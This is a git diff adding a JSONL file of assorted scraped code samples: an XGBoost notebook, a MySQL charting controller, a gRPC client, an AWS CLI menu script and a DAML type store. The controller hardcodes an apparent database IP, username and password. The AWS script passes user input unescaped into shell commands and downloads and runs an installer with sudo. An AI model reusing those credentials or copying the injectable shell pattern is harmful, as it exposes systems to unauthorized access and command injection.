diff --git "a/1729.jsonl" "b/1729.jsonl"
new file mode 100644
--- /dev/null
+++ "b/1729.jsonl"
@@ -0,0 +1,655 @@
+{"seq_id":"169357206","text":"\n# coding: utf-8\n\n# In[14]:\n\nimport xgboost as xgb\nimport pandas as pd\nimport numpy as np\nfrom numpy import genfromtxt\nfrom sklearn.metrics import accuracy_score\n\n\n# In[15]:\n\n# loading data:\ncolumns = [\"BQ_TTRA\",\"SEXO\",\"EDAD\",\"NACIO\",\"TITU\",\"RAMA\",\"AMBITO\",\"T_UNIV\",\"DISCA\",\"EST_B1\",\"EST_M1\",\"EST_M2\",\"IDIOMAS\",\"TITIDI1\",\"TITIDI2\",\"TITIDI3\",\"TIC\",\"PRAC_CR\",\"PRAC_CM\",\"EST_XCU\",\"EST_X_M\"]\ndata = np.genfromtxt(\"/Users/RobertPG/Google Drive/aaUPF/4t Berkeley/TFG/Data/ML data/MULTINOMIAL_DATA_xgboost.csv\", delimiter=',')\ndata = pd.DataFrame(data, columns = columns)\n\n# one-hot encoding:\ncat_cols = [\"SEXO\",\"EDAD\",\"NACIO\",\"TITU\",\"RAMA\",\"AMBITO\",\"T_UNIV\",\"DISCA\",\"EST_B1\",\"EST_M1\",\"EST_M2\",\"TITIDI1\",\"TITIDI2\",\"TITIDI3\",\"TIC\",\"PRAC_CR\",\"EST_XCU\"]\ndata_encoded = pd.get_dummies(data, columns = cat_cols)\ndata_encoded = pd.DataFrame(data_encoded)\ndata_encoded.head(10)\n\n\n# In[16]:\n\n# creating data subsets (first 9500 rows train, the rest test):\ntraining_data = data_encoded.iloc[:9500, :]\ntest_data = data_encoded.iloc[9500:, :]\n\n# target definition:\ny_train = training_data[\"BQ_TTRA\"]\ny_test = test_data[\"BQ_TTRA\"]\n\n# training data:\nX_train = training_data.iloc[:, 1:]\nX_test = test_data.iloc[:, 1:]\n\n\n# In[17]:\n\n# read in data\ndtrain = xgb.DMatrix(X_train, label = y_train, missing = np.nan)\ndtest = xgb.DMatrix(X_test, label = y_test, missing = np.nan)\n\n\n# In[60]:\n\n# specify parameters via map\nparam = {'max_depth':10, 'eta':0.1, 'silent':0, 'objective':'multi:softmax', 'num_class':8, 'lambda':10, 'gamma':0.5}\nnum_round = 10\nwatchlist = [(dtest, 'test'), (dtrain, 'train')]\nbst = xgb.train(param, dtrain, num_round, watchlist)\n\n\n# In[61]:\n\n# make prediction\npreds = bst.predict(dtest)\n\npredictions = [round(value) for value in preds]\n# evaluate predictions\naccuracy = accuracy_score(y_test, predictions)\nprint(\"Accuracy: %.2f%%\" % (accuracy * 100.0))\n\n\n# In[ ]:\n\n\n\n\n# In[ ]:\n\n\n\n","sub_path":"Multinomial+Decision+Tree.py","file_name":"Multinomial+Decision+Tree.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"136153408","text":"import MySQLdb  # for MySQL\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import pyplot\nimport matplotlib as mpl\nimport numpy as np\nimport pandas as pd\n\n\nFontSize = 20\ndef makeGraph():\n    # AVOID THE ERROR FROM RUNNING THE SERVER ALL THE TIME.\n    plt.switch_backend('agg')\n    con = MySQLdb.connect('50.116.112.31', 'tourvi45_aps', 'unip@2020')\n    con.select_db('tourvi45_APS')\n    cursor = con.cursor()\n\n    cursor.execute(\"select distinct(farming) from producers\")\n    labels_farming = cursor.fetchall()\n\n    cursor.execute(\"select farming, sum(annualamount) from producers group by(farming)\")\n    culti_qtd = cursor.fetchall()\n\n    cursor.execute(\"select sum(annualamount) from producers\")\n    totalCulti = cursor.fetchall()\n\n    cursor.execute(\"select count(pesticide) from producers\")\n    totalAgri = cursor.fetchall(),\n\n    # summing all the products according to their pesticide\n    cursor.execute('select pesticide, sum(annualamount) from producers group by(pesticide)')\n    agro_qtd = cursor.fetchall()\n\n    query = cursor.execute('select distinct(pesticide) from producers')\n    labels_pesticide = cursor.fetchall()\n# 
--------------------------------------------------------------------------------------------\n\n def plot1():\n plot1_cult_qtd = []\n for valor in culti_qtd:\n plot1_cult_qtd.append(valor[1])\n\n plot1_labels = []\n for valor in labels_farming:\n plot1_labels.append(valor[0])\n\n plot1_totalCulti = totalCulti[0]\n\n porcent_culti =[]\n\n for value in plot1_cult_qtd:\n porcent_culti.append((value / plot1_totalCulti[0]) * 100)\n \n porcent = pd.Series(porcent_culti)\n print(porcent)\n\n porcent.astype(float).plot(color = 'blue')\n plt.bar(plot1_labels, porcent_culti, color = '#F2410C')\n # plt.tick_params(labelsize= 11)\n plt.xlabel(\"Produtos\", fontsize = FontSize)\n plt.ylabel(\"% Porcentagem\", fontsize = FontSize)\n plt.savefig(\"App/Static/images/plot1.png\")\n plt.close()\n \n # --------------------------------------------------------------------------------------------\n\n\n def plot2():\n\n plot2_agro_qtd = []\n for valor in agro_qtd:\n plot2_agro_qtd.append(valor[1])\n\n plot2_labels = []\n for valor in labels_pesticide:\n plot2_labels.append(valor[0])\n\n porcent = pd.Series(plot2_agro_qtd)\n\n plt.figure(figsize=(10,8))\n porcent.astype(float).plot(color = 'blue')\n plt.bar(plot2_labels, plot2_agro_qtd, color = 'red')\n plt.tick_params(labelsize= 15)\n plt.xlabel(\"Agrotóxicos\", fontsize = FontSize)\n plt.ylabel(\"Quantidade\", fontsize = FontSize)\n plt.savefig(\"App/Static/images/plot2.png\")\n plt.close()\n\n# --------------------------------------------------------------------------------------------\n def plot3():\n plot3_cult_qtd = []\n for valor in culti_qtd:\n plot3_cult_qtd.append(valor[1])\n\n plot3_labels = []\n for valor in labels_farming:\n plot3_labels.append(valor[0])\n \n plot3_totalCulti = totalCulti[0]\n\n plot3_porcent_culti =[]\n print(plot3_totalCulti[0])\n for value in plot3_cult_qtd:\n plot3_porcent_culti.append((value / plot3_totalCulti[0]) * 100)\n \n plt.pie(plot3_porcent_culti, labels= plot3_labels, autopct=\"%2.2f%%\")\n plt.legend(plot3_labels,bbox_to_anchor = [1, 1])\n plt.savefig(\"App/Static/images/plot3.png\")\n plt.close()\n\n# --------------------------------------------------------------------------------------------\n def plot4():\n\n plot4_labels = []\n for valor in labels_pesticide:\n plot4_labels.append(valor[0])\n\n plot4_agro_qtd = []\n for valor in agro_qtd:\n plot4_agro_qtd.append(valor[1])\n\n plot4_totalagri = totalAgri[0]\n plot4_porcent_agri = []\n\n for value in plot4_agro_qtd:\n plot4_porcent_agri.append((value / plot4_totalagri[0][0]) * 100)\n \n plt.pie(plot4_porcent_agri, labels= plot4_labels, autopct=\"%2.2f%%\")\n plt.legend(plot4_labels, bbox_to_anchor = [1, 1])\n plt.savefig(\"App/Static/images/plot4.png\")\n plt.close()\n \n plot1()\n plot2()\n plot3()\n plot4()\n","sub_path":"App/Controllers/dashboardController.py","file_name":"dashboardController.py","file_ext":"py","file_size_in_byte":4363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"36821643","text":"from typing import List\n\nimport grpc\nfrom google.protobuf.empty_pb2 import Empty\n\nimport baikal.language.custom_dict_pb2 as pb\nimport baikal.language.custom_dict_pb2_grpc as cds\nimport baikal.language.dict_common_pb2 as common\n\n\ndef build_dict_set(domain: str, name: str, dict_set: set) -> common.DictSet:\n \"\"\"\n make a DictSet message using domain, name, and dict_set\n :param domain: the domain name of dict_set\n :param name: name is built-in use only, which is fixed as one of 'np-set', 'cp-set', 
'cp-caret'.\n    :param dict_set: the user-provided set of custom dictionary entries.\n    :return: the constructed DictSet data\n    \"\"\"\n    ret = common.DictSet()\n    ret.name = domain + \"-\" + name\n    ret.type = common.DictType.WORD_LIST\n    for v in dict_set:\n        ret.items[v] = 1\n    return ret\n\n\nclass CustomDictionaryServiceClient:\n    \"\"\"\n    The custom dictionary client, which can create, get, update, list, and delete your own custom dictionaries.\n    \"\"\"\n    stub = None\n\n    def __init__(self, remote):\n        super().__init__()\n        channel = grpc.insecure_channel(remote)\n        self.stub = cds.CustomDictionaryServiceStub(channel)\n\n    def get_list(self) -> List[pb.CustomDictionaryMeta]:\n        req = Empty()\n        try:\n            res = self.stub.GetCustomDictionaryList(req)\n            return res.domain_dicts\n        except grpc.RpcError as e:\n            print(e)\n            return []\n\n    def get(self, domain: str) -> pb.CustomDictionary:\n        req = pb.GetCustomDictionaryRequest()\n        req.domain_name = domain\n        try:\n            res = self.stub.GetCustomDictionary(req)\n            return res.dict\n        except grpc.RpcError as e:\n            print(e)\n            return None\n\n    def update(self, domain: str, np: set, cp: set, cp_caret: set) -> bool:\n        \"\"\"\n        Update custom dictionary.\n        :param domain: domain name of these custom dictionaries.\n        :param np: proper noun set\n        :param cp: compound noun set\n        :param cp_caret: splittable compound noun set\n        :return: if successfully updated return true\n        \"\"\"\n        req = pb.UpdateCustomDictionaryRequest()\n        req.domain_name = domain\n\n        req.dict.domain_name = domain\n\n        req.dict.np_set.CopyFrom(build_dict_set(domain, 'np-set', np))\n        req.dict.cp_set.CopyFrom(build_dict_set(domain, 'cp-set', cp))\n        req.dict.cp_caret_set.CopyFrom(build_dict_set(domain, 'cp-caret-set', cp_caret))\n\n        try:\n            res = self.stub.UpdateCustomDictionary(req)\n            return res.updated_domain_name == domain\n        except grpc.RpcError as e:\n            print(e)\n            return False\n\n    def remove_all(self) -> List[str]:\n        \"\"\"\n        Deletes all custom dictionaries, then returns.\n        :return: the names of the deleted domains\n        \"\"\"\n        req = pb.RemoveCustomDictionariesRequest()\n        req.all = True\n\n        try:\n            res = self.stub.RemoveCustomDictionaries(req)\n            return res.deleted_domain_names.keys()\n        except grpc.RpcError as e:\n            print(e)\n            return []\n\n    def remove(self, domains: List[str]) -> List[str]:\n        \"\"\"\n        Deletes the custom dictionaries of the specified domains.\n        :param domains: the list of domains whose custom dictionaries will be deleted\n        :return: the names of the deleted domains\n        \"\"\"\n        req = pb.RemoveCustomDictionariesRequest()\n        req.domain_names.extend(domains)\n        req.all = False\n        try:\n            res = self.stub.RemoveCustomDictionaries(req)\n            return res.deleted_domain_names.keys()\n        except grpc.RpcError as e:\n            print(e)\n            return []\n","sub_path":"deeqnlpy/_custom_dict_client.py","file_name":"_custom_dict_client.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"377412030","text":"# aws section of menu driven program\r\n# written by vinay prakash jadhav ARTH20-team12.7 for task8\r\n\r\n# To use this code call the check_requirements() in the main menu driven program while integrating the code and remove the if __name__ == \"__main__\"\r\n\r\n# this program can perform the following functions:\r\n# install aws cli on your system if required\r\n# configure aws cli\r\n# create a key-pair and save it on system\r\n# Create a new aws instance\r\n# Start an aws instance\r\n# Describe ec2 instance\r\n# Create an EBS volume\r\n# Attach an EBS volume to an ec2 instance\r\n# Create s3 bucket\r\n# Upload a file to a bucket\r\n# Create a distribution in aws CloudFront\r\n\r\n# importing os to get system() so that 
we can execute aws configure command\r\n\r\nimport os\r\n\r\n#importing subprocess to get access to getstatusoutput() so that we can execute aws cli code\r\nimport subprocess\r\n\r\ndef menu():\r\n\tprint(\"\\n-----------aws commands executor-------\")\r\n\r\n\tdef command_executor(command):\r\n\t\tx = subprocess.getstatusoutput(command)\r\n\t\tprint(x[1])\r\n\t\tif x[0] == 0 :\r\n\t\t\tprint(\"command executed successfully\")\r\n\r\n\r\n\t# menu_aws() will execute will display the menu and get the choice from user and prepare a command to be executed\r\n\tdef menu_aws():\r\n\t\twhile True:\r\n\t\t\tprint(60*\"-\")\r\n\t\t\tprint(\"\\t1. Create a key pair\")\r\n\t\t\tprint(\"\\t2. Create a new aws instance\")\r\n\t\t\tprint(\"\\t3. Start a aws instance\")\r\n\t\t\tprint(\"\\t4. Describe ec2 instance\")\r\n\t\t\tprint(\"\\t5. Create a EBS volume\")\r\n\t\t\tprint(\"\\t6. Attach a EBS volume to ec2 instance\")\r\n\t\t\tprint(\"\\t7. Create s3 bucket\")\r\n\t\t\tprint(\"\\t8. Upload a file in bucket\")\r\n\t\t\tprint(\"\\t9. Create a distribution in aws CloudFront\")\r\n\t\t\tprint(\"\\t10. Exit\")\r\n\t\t\tprint(60*\"-\")\r\n\t\t\t\r\n\t\t\tchoice = int(input(\"Enter Choice : \"))\r\n\t\t\tif choice == 1 :\r\n\t\t\t\tkey_name = input(\"Enter key name : \")\r\n\t\t\t\t#original cli command for creating aws key-pair: aws ec2 create-key-pair --key-name MyKeyPair --query 'KeyMaterial' --output text > MyKeyPair.pem\r\n\t\t\t\t#but we want that user should give the name of key pair hence using string manipulation\r\n\t\t\t\tcommand = \"aws ec2 create-key-pair --key-name \" + key_name + \" --output text > \"+ key_name+\".pem\"\r\n\t\t\t\tprint(\"Note: If the key-pair downloaded is not working for ssh login then remove the additional text[metadata of key-pair] from keypair_name.pem file.\")\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 2:\r\n\t\t\t\timageId = \"ami-052c08d70def0ac62\"\r\n\t\t\t\tinstancetype = \"t2.micro\"\r\n\t\t\t\tinstance_count = \"1\"\r\n\t\t\t\tkey_name = input(\"key-name : \")\r\n\t\t\t\tprint(\"Note : Default values are set so that you do not use options other than free tier\")\r\n\t\t\t\tprint(\"imageId = \" + imageId + \"\\nInstance type = \" + instancetype + \"\\nInstance count = \" + instance_count)\r\n\t\t\t\tcommand = \"aws ec2 run-instances --image-id \"+ imageId + \" --instance-type \" + instancetype + \" --count \" + instance_count + \" --key-name \" + key_name\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 3:\r\n\t\t\t\tinstanceId = input(\"Enter instance id to start a instance : \")\r\n\t\t\t\tcommand = \"aws ec2 start-instances --instance-ids \"+ instanceId \r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 4:\r\n\t\t\t\tcommand = \"aws ec2 describe-instances\" \r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\t\r\n\t\t\telif choice == 5:\r\n\t\t\t\tprint(\"Note: Size is restricted to 5 Gib per volume to keep you bounded in free tier\")\r\n\t\t\t\tsize = input(\"Enter size of ebs volume : \")\r\n\t\t\t\tregion = input(\"Enter availability zone : \")\r\n\t\t\t\tif int(size) <= 5 : \r\n\t\t\t\t\tcommand = \"aws ec2 create-volume --volume-type gp2 --size \" + size + \" --availability-zone \" + region\r\n\t\t\t\telse: \r\n\t\t\t\t\tprint(\"Size must be less than 5 Gib\")\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 6:\r\n\t\t\t\tvolume_id = input(\"Enter Volume id of ebs storage : \")\r\n\t\t\t\tinstance_id = input(\"Enter Instance id :\")\r\n\t\t\t\tdevice = input(\"Enter device name[ex - 
/dev/sdf] : \")\r\n\r\n\t\t\t\tcommand = \"aws ec2 attach-volume --volume-id \" + volume_id + \" --instance-id \" + instance_id + \" --device \" + device\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 7:\r\n\t\t\t\tbucket_name = input(\"Enter bucket name : \")\r\n\t\t\t\tregions3 = input(\"Enter region : \")\r\n\t\t\t\tcommand = \"aws s3api create-bucket --bucket \" + bucket_name + \" --region \" + regions3\r\n\t\t\t\tcommand_executor(command)\r\n\r\n\t\t\telif choice == 8:\r\n\t\t\t\tfile_path = input(\"Enter file path[ex - c:\\\\users\\\\d\\\\desktop\\\\image.jpg] : \")\r\n\t\t\t\tbucket_name1 = input(\"Enter bucket name\")\r\n\t\t\t\tfilename = input(\"What should be the file name of your file in s3 bucket? : \")\r\n\r\n\t\t\t\tcommand = \"aws s3 cp \" + file_path + \" s3://\" + bucket_name1 + \"/\" + filename\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\t\t\telif choice == 9:\r\n\t\t\t\tdomain_name = input(\"Enter a domain to create a distribution : \")\r\n\t\t\t\tcommand = \"aws cloudfront create-distribution --origin-domain-name \" + domain_name\r\n\t\t\t\tcommand_executor(command)\r\n\t\t\t\r\n\r\n\t\t\telif choice == 10:\r\n\t\t\t\tprint(\"Exited from AWS command Executer\")\r\n\t\t\t\tbreak\r\n\r\n\r\n\t# check_requirements() is used to check whether aws cli is installed in the system on which the menu driven program is going to run\r\n\tdef check_requirements():\r\n\t\tprint(\"checking requirements...\")\r\n\t\tx = subprocess.getstatusoutput(\"aws --version\")\r\n\t\tif x[0] != 0 :\r\n\t\t\tprint(\"AWS cli not installed on your system\")\r\n\t\t\tprint(\"please install aws cli\")\r\n\t\t\tch = input(\"press [y/n] = \" )\r\n\t\t\tif ch == \"y\" or ch == \"Y\":\r\n\t\t\t\tos.system(\" curl \\\"https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip\\\" -o \\\"awscliv2.zip\\\"\")\r\n\t\t\t\tos.system(\"unzip awscliv2.zip\")\r\n\t\t\t\tos.system(\"sudo ./aws/install\")\r\n\t\t\t\tcheck_requirements()\r\n\t\t\telse:\r\n\t\t\t\tprint(\"aws cli required to run aws commands\")\r\n\t\t\t\t\r\n\t\telse:\r\n\t\t\tprint(\"aws cli is installed on system..\")\r\n\t\t\tprint(\"Everything is okay!!\")\r\n\t\t\tprint(\"Configuring aws cli..\")\r\n\t\t\tos.system(\"aws configure\")\r\n\t\t\tmenu_aws()\r\n\r\n\t\r\n\tcheck_requirements()\r\n\r\n\r\n#To test this program, call menu() or remove the comment from next line\r\n#menu()\r\n\r\n'''\r\n\treferences:\r\n\thttps://docs.aws.amazon.com/cli/latest/userguide/cli-services-ec2-keypairs.html\r\n\r\n\r\n\tuse the command sudo pip install awscli --force-reinstall --upgrade if even after aws installation on linux system you are getting error that aws not found\r\n\r\n\r\n'''\r\n","sub_path":"AWS.py","file_name":"AWS.py","file_ext":"py","file_size_in_byte":6107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"204733526","text":"from dataclasses import dataclass\n\nfrom scripts.paths import api_problem_list_url, web_problem_list_url, web_collection_obj_url, api_collection_obj_url\n\n\n@dataclass\nclass ApiCollection:\n basename: str\n index: int\n title: str\n short_title: str\n difficulty: int\n size: int\n web_url: str\n api_url: str\n description: str = ''\n\n def tojson(self):\n return dict(\n basename=self.basename,\n index=self.index,\n title=self.title,\n short_title=self.short_title,\n difficulty=self.difficulty,\n size=self.size,\n web_url=self.web_url,\n api_url=self.api_url,\n description=self.description)\n\n\ndef new_collection(\n basename: str,\n index: 
int,\n title: str,\n short_title: str,\n difficulty: int,\n size: int,\n description: str = ''):\n return ApiCollection(\n basename=basename,\n index=index,\n title=title,\n short_title=short_title,\n difficulty=difficulty,\n size=size,\n web_url=web_collection_obj_url(collection_basename=basename),\n api_url=api_collection_obj_url(collection_basename=basename),\n description=description)\n","sub_path":"scripts/models/ApiCollection.py","file_name":"ApiCollection.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"282051530","text":"# Copyright (c) 2019 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.\n# SPDX-License-Identifier: Apache-2.0\n\nfrom collections import defaultdict\nfrom functools import reduce\nfrom operator import add\nfrom threading import RLock\nfrom types import MappingProxyType\n\nfrom dataclasses import dataclass\nfrom typing import Any, Collection, Dict, Generic, List, Mapping, Optional, Sequence, TypeVar, \\\n Union, TYPE_CHECKING\n\nfrom .types import Template, TemplateChoice, Type, TypeReference, UnresolvedTypeReference, \\\n TypeAdjective, ConcreteType, ValueReference\nfrom ..util.typing import safe_cast, safe_dict_cast\n\nif TYPE_CHECKING:\n from ..damlast.daml_lf_1 import Archive, Expr, Package\n\nT = TypeVar('T')\n\n\nclass PackageStoreBuilder:\n \"\"\"\n Convenience class for building up a :class:`PackageStore`.\n \"\"\"\n\n def __init__(self):\n self._archives = list() # type: List[Archive]\n self._value_types = dict() # type: Dict[ValueReference, Expr]\n self._data_types = dict() # type: Dict[TypeReference, Type]\n self._templates = dict() # type: Dict[TypeReference, Template]\n\n def add_archive(self, archive: 'Archive') -> None:\n self._archives.append(archive)\n\n def add_type(self, name: TypeReference, data_type: Type):\n safe_cast(TypeReference, name)\n safe_cast(Type, data_type)\n self._data_types[name] = data_type\n\n def add_value(self, name: ValueReference, value: 'Expr'):\n self._value_types[name] = value\n\n def add_template(self, template: Template):\n self._templates[template.data_type.name] = safe_cast(Template, template)\n\n def get_type(self, name: TypeReference) -> Optional[Type]:\n return self._data_types.get(name)\n\n def build(self) -> 'PackageStore':\n return PackageStore(self._archives, self._value_types, self._data_types, self._templates)\n\n\nclass PackageStore:\n \"\"\"\n A thread-safe store of type information.\n \"\"\"\n\n @classmethod\n def empty(cls):\n \"\"\"\n Create an empty store.\n \"\"\"\n return cls([], {}, {}, {})\n\n def __init__(\n self,\n archives: 'Collection[Archive]',\n value_types: 'Dict[ValueReference, Expr]',\n data_types: 'Dict[TypeReference, Type]',\n templates: 'Dict[TypeReference, Template]'):\n self._lock = RLock()\n self._archives = list(archives)\n self._cache = PackageStoreCache(EMPTY_TYPE_CACHE, EMPTY_TYPE_CACHE, EMPTY_TYPE_CACHE)\n self._value_types = value_types # safe_dict_cast(ValueReference, Expr, value_types)\n self._data_types = safe_dict_cast(TypeReference, Type, data_types)\n self._templates = safe_dict_cast(TypeReference, Template, templates)\n\n def archives(self) -> 'Collection[Archive]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Archive`s.\n \"\"\"\n with self._lock:\n return list(self._archives)\n\n def packages(self) -> 'Collection[Package]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Package`s.\n \"\"\"\n 
with self._lock:\n return [a.package for a in self._archives]\n\n def package_ids(self) -> 'Collection[str]':\n \"\"\"\n Return a copy of the collection of the set of loaded :class:`Package`s.\n \"\"\"\n with self._lock:\n return [a.hash for a in self._archives]\n\n def register_all(self, other_store: 'PackageStore') -> 'PackageStore':\n \"\"\"\n Register all types declared in the other :class:`PackageStore`.\n\n :param other_store: A package store to copy types, templates, and choices from.\n :return: A reference to this object.\n \"\"\"\n if self is not other_store:\n with self._lock:\n self._archives.extend(other_store._archives)\n self._value_types.update(other_store._value_types)\n self._data_types.update(other_store._data_types)\n self._templates.update(other_store._templates)\n self._cache = PackageStoreCache(\n TypeCache.build(self._value_types),\n TypeCache.build(self._data_types),\n TypeCache.build(self._templates))\n return self\n\n def resolve_value_reference(self, value_ref: ValueReference) -> 'Expr':\n with self._lock:\n return self._value_types[value_ref]\n\n def resolve_type_reference(self, template_ref: TypeReference) -> Type:\n \"\"\"\n Resolve a type based on its reference.\n\n :param template_ref:\n A :class:`TypeReference` that refers to a type.\n :return:\n The :class:`Type` that is referred to by this type reference.\n :raise KeyError:\n If the :class:`TypeReference` does not have a corresponding value in this store.\n \"\"\"\n safe_cast(TypeReference, template_ref)\n\n with self._lock:\n return self._data_types[template_ref]\n\n def find_types(self, adjective: TypeAdjective = TypeAdjective.ANY) \\\n -> Mapping[TypeReference, ConcreteType]:\n with self._lock:\n if adjective == TypeAdjective.ANY:\n return MappingProxyType(dict(self._data_types))\n\n return {tt: data_type\n for tt, data_type in self._data_types.items()\n if isinstance(data_type, ConcreteType)\n and data_type.adjective & adjective != TypeAdjective.NONE}\n\n def resolve_template(self, template: Union[None, str, TypeReference, UnresolvedTypeReference]) \\\n -> Collection[Template]:\n \"\"\"\n Return a collection of :class:`Template` instances that match the specified template name.\n\n Some special parameters:\n * If ``\"*\"`` is passed in, all templates are returned.\n * If ``None`` is passed in, an empty collection is returned.\n\n :param template:\n A template name or a :class:`TypeReference`.\n :return:\n A collection of matching templates, or an empty collection if none match. This method\n never returns ``None``.\n \"\"\"\n from .lookup import validate_template\n\n if isinstance(template, Template):\n # if we were given a Template for some strange reason, just simply return a single-item\n # tuple of that given Template\n return [template]\n\n package_id, template_name = validate_template(template)\n return self._cache.templates.lookup(package_id, template_name)\n\n def resolve_template_type(\n self, template: 'Union[None, str, TypeReference, UnresolvedTypeReference]') \\\n -> Dict[TypeReference, Type]:\n \"\"\"\n Return a collection of types that match for the template.\n\n :param template:\n A template name or a :class:`TypeReference`.\n :return:\n A dictionary of possible matches, or empty if there are no matches. 
This method never\n returns ``None``.\n \"\"\"\n return {template.data_type.name: template.data_type\n for template in self.resolve_template(template)}\n\n def resolve_choice(self, template: Any, choice: str) -> Dict[TypeReference, TemplateChoice]:\n \"\"\"\n Return all possible choices for the combination of template identifier and choice name.\n If template is ``'*'`` or ``None``, all choices with the specified name are returned.\n \"\"\"\n matches = dict()\n for t in self.resolve_template(template):\n for c in t.choices:\n if c.name == choice:\n matches[t.data_type.name] = c\n return matches\n\n\nclass PackageProvider:\n \"\"\"\n Interface to an object that can provide package information.\n \"\"\"\n\n def get_package_ids(self) -> 'Sequence[str]':\n \"\"\"\n Return the current universe of package IDs.\n \"\"\"\n raise NotImplementedError\n\n def fetch_package(self, package_id: str) -> bytes:\n \"\"\"\n Retrieve the bytes that correspond to a package.\n \"\"\"\n raise NotImplementedError\n\n def get_all_packages(self) -> 'Mapping[str, bytes]':\n return {pkg_id: self.fetch_package(pkg_id) for pkg_id in self.get_package_ids()}\n\n\nclass MemoryPackageProvider(PackageProvider):\n def __init__(self, mapping: 'Mapping[str, bytes]'):\n self.mapping = mapping\n\n def get_package_ids(self) -> 'Sequence[str]':\n return list(self.mapping.keys())\n\n def fetch_package(self, package_id: str) -> bytes:\n return self.mapping.get(package_id)\n\n\n@dataclass(frozen=True)\nclass PackageStoreCache:\n value_types: 'TypeCache[Type]'\n data_types: 'TypeCache[Type]'\n templates: 'TypeCache[Template]'\n\n\n@dataclass(frozen=True)\nclass TypeCache(Generic[T]):\n \"\"\"\n Immutable cache of type information.\n\n Instance attributes:\n\n .. attribute:: TypeCache.by_package_lookup\n\n A mapping from package ID strings to another mapping, where keys are fully-qualified type\n names for templates to a collection of matching Template instances. These collections are\n never non-empty; they will only ever contain multiple entries if there is a collision in\n dot-separated names. None of these maps contain ``'*'`` as keys; wildcards mut be\n implemented by the caller.\n\n .. attribute:: TypeCache.by_name_lookup\n\n A mapping from fully-qualified type names to a sub-mapping, where the sub-mapping keys are\n package IDs and the value are collections of Template. None of these maps contain ``'*'``\n as keys; wildcards mut be implemented by the caller.\n \"\"\"\n\n everything: Collection['T']\n by_package_lookup: 'Mapping[str, Mapping[str, Collection[T]]]'\n by_name_lookup: 'Mapping[str, Mapping[str, Collection[T]]]'\n\n @classmethod\n def build(cls, objects: 'Mapping[TypeReference, T]') -> 'TypeCache[T]':\n everything = tuple(objects)\n by_package_lookup = defaultdict(lambda: defaultdict(list))\n by_name_lookup = defaultdict(lambda: defaultdict(list))\n\n for k, v in objects.items():\n for package_id in (k.module.package_id, '*'):\n for valid_name in (k.full_name, k.full_name_unambiguous, '*'):\n by_package_lookup[package_id][valid_name].append(v)\n by_name_lookup[valid_name][package_id].append(v)\n\n return TypeCache(\n everything,\n _immutable_mmc(by_package_lookup),\n _immutable_mmc(by_name_lookup))\n\n def lookup(self, package_id: str, type_name: str) -> Collection[T]:\n \"\"\"\n Look up items based on package ID and type name. 
The values cannot be ``None``, but they\n can be the special-meaning ``'*'`` value.\n \"\"\"\n safe_cast(str, package_id)\n safe_cast(str, type_name)\n\n if package_id == '*':\n candidates = reduce(add, self.by_name_lookup.get(type_name, {}).values(), ())\n elif type_name == '*':\n candidates = reduce(add, self.by_package_lookup.get(package_id, {}).values(), ())\n else:\n candidates = self.by_package_lookup.get(package_id, {}).get(type_name, ())\n\n return {t.data_type.name.full_name_unambiguous: t for t in candidates}.values()\n\n\ndef _immutable_mmc(mapping: 'Mapping[str, Mapping[str, Collection[T]]]') -> \\\n 'Mapping[str, Mapping[str, Collection[T]]]':\n \"\"\"\n Create an immutable copy of :class:`TemplateStoreCache` data structures.\n \"\"\"\n return MappingProxyType({\n k1: MappingProxyType({k2: tuple(v) for k2, v in v1.items()})\n for k1, v1 in mapping.items()\n })\n\n\nEMPTY_MAPPING = MappingProxyType({})\nEMPTY_TYPE_CACHE = TypeCache((), EMPTY_MAPPING, EMPTY_MAPPING)\n","sub_path":"python/dazl/model/types_store.py","file_name":"types_store.py","file_ext":"py","file_size_in_byte":11801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"596437412","text":"#-*- coding: utf-8 -*-\nfrom typing import List\nimport math\n\nimport time\ndef timeit(func):\n def wrapped(*args, **kwargs):\n start = time.time()\n ret = func(*args, **kwargs)\n elapsed = time.time() - start\n print(\"elapsed: %s\" % elapsed)\n return ret\n return wrapped\n\nimport sys\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n mini = sys.maxsize\n maxi = None\n max_diff = 0\n for price in prices:\n if price < mini:\n mini = price\n maxi = price\n else:\n mini = min(mini, price)\n maxi = max(maxi, price)\n #print(\"maxi:%s, mini:%s\" % (maxi, mini))\n max_diff = max(max_diff, maxi - mini)\n return max_diff\n\n\nsamples = [\n ([7,1,5,3,6,4], 5),\n ([7,6,4,3,1], 0),\n]\n\n\nfor S, expected in samples:\n ans = Solution().maxProfit(S)\n print(ans)","sub_path":"lc/esy/20191002_esy_121_best_time_buy_and_sell_stock.py","file_name":"20191002_esy_121_best_time_buy_and_sell_stock.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"255242557","text":"#!/usr/bin/env python\n\nimport cPickle as pickle\nimport functools\nimport inspect\nimport datetime\n\nimport rpyc\n\n__VERSION__ = '0.81'\nPROXY_SERVER = 'MiRmdDbU1.MackenzieFinancial.bz' # UAT\n\nproxy_connection = rpyc.connect(PROXY_SERVER, 18866)\n\n_mark = 